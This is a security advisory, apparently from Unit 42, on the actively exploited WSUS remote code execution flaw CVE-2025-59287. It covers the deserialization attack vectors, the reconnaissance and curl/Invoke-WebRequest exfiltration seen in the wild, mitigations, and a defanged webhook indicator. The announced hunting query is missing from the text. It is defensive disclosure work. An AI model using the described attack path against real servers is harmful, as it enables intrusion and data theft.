On October 14, 2025, a significant vulnerability was discovered in Microsoft’s Windows Server Update Services (WSUS), a vital tool for managing software updates in enterprise environments. This critical remote code execution (RCE) vulnerability, designated as CVE-2025-59287, was initially addressed by Microsoft during its October Patch Tuesday. However, the initial patch proved insufficient, prompting an urgent out-of-band security update on October 23, 2025. Security researchers, including those from Unit 42, quickly noted active exploitation attempts shortly after the emergency patch was released, highlighting a pressing and serious risk to affected organizations.
Key Details of the Vulnerability
- Vulnerability: Critical Remote Code Execution (RCE) in WSUS, with a CVSS score of 9.8.
- Impact: This flaw enables a remote, unauthenticated attacker to execute arbitrary code with system privileges on vulnerable servers.
- Status: Actively exploited, with threat actors detected exploiting the vulnerability within hours of the emergency patch release.
- Urgency: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) included this vulnerability in its Known Exploited Vulnerabilities (KEV) Catalog on October 24, emphasizing the immediate threat it poses.
For organizations unable to apply the emergency patches without delay, Microsoft has suggested temporary workarounds to mitigate the risk. Palo Alto Networks customers benefit from enhanced protection against activities related to CVE-2025-59287 through various products and services, including the expertise of the Unit 42 Incident Response team, which can assist with incident response and proactive risk assessments.
Understanding CVE-2025-59287
WSUS serves as a cornerstone for IT administrators, facilitating the centralized management and distribution of Microsoft updates across corporate networks. Its role as a trusted source for software patches makes it an attractive target for attackers. A successful compromise of a WSUS server can lead to lateral movement and extensive network infiltration.
The vulnerability arises from an “unsafe deserialization of untrusted data.” Researchers have identified multiple attack vectors, including sending crafted requests to the GetCookie() endpoint, which leads to improper deserialization of an AuthorizationCookie object via the insecure BinaryFormatter. Another vector involves the ReportingWebService, where unsafe deserialization is triggered through SoapFormatter. In both scenarios, a remote, unauthenticated attacker can manipulate the system into executing malicious code with elevated privileges.
The vulnerability specifically affects systems with the WSUS role enabled:
- Affected Software: Microsoft Windows Server 2012, 2012 R2, 2016, 2019, 2022 (including 23H2 Edition), and 2025.
- Required Condition: The vulnerability impacts only servers with the WSUS Server Role enabled, which is not the default setting.
Current Exploitation Landscape
Following the public disclosure of a proof-of-concept exploit, Unit 42 and other security firms observed a surge in active scanning and exploitation attempts. Their analysis indicates a consistent methodology focused on gaining initial access and conducting internal reconnaissance.
- Initial Access: Attackers are targeting publicly exposed WSUS instances on default TCP ports, 8530 (HTTP) and 8531 (HTTPS).
- Execution: Malicious PowerShell commands are executed through specific parent processes, with forensic process chains observed, such as wsusservice.exe → cmd.exe → cmd.exe → powershell.exe and w3wp.exe → cmd.exe → cmd.exe → powershell.exe.
- Reconnaissance: The initial payload executes commands to gather intelligence on the internal network, including whoami, net user /domain, and ipconfig /all. This command set is designed to quickly map the internal domain structure and identify high-value user accounts, providing attackers with a roadmap for lateral movement.
- Data Exfiltration: Information collected is exfiltrated to a remote, attacker-controlled endpoint using a PowerShell payload that attempts Invoke-WebRequest and defaults to curl.exe if necessary.
Approximately 5,500 WSUS instances have been identified as exposed to the internet, illustrating the global attack surface. This reconnaissance-focused tactic suggests that initial exploitation is merely a precursor to broader network compromise, making immediate remediation and threat hunting essential.
Interim Recommendations
For organizations unable to deploy emergency patches immediately, Microsoft has recommended temporary workarounds to mitigate risk until full patching can be accomplished. As of October 27, the interim guidance includes:
- Disable the WSUS Server Role: Disabling the WSUS role eliminates the attack vector entirely, though it will prevent the server from managing and distributing updates to client systems.
- Block High-Risk Ports: Block all inbound traffic to TCP ports 8530 and 8531 at the host-level firewall. This action removes the attack vector but will also prevent the server from managing and distributing updates.
Managed Threat Hunting Queries
The Unit 42 Managed Threat Hunting team is actively monitoring attempts to exploit this CVE across our Managed Services customers, utilizing telemetry available within Cortex XDR. Customers who do not leverage Unit 42 Managed Services can also utilize the following XQL query to search for signs of exploitation:
Indicators of Compromise
- hxxp://webhook[.]site/22b6b8c8-2e07-4878-a681-b772e569aa6a
Updated October 27, 2025, at 1:50 p.m. PT to revise Cortex product protection language.
Updated October 27, 2025, at 2:37 p.m. PT to include Managed Threat Hunting queries.
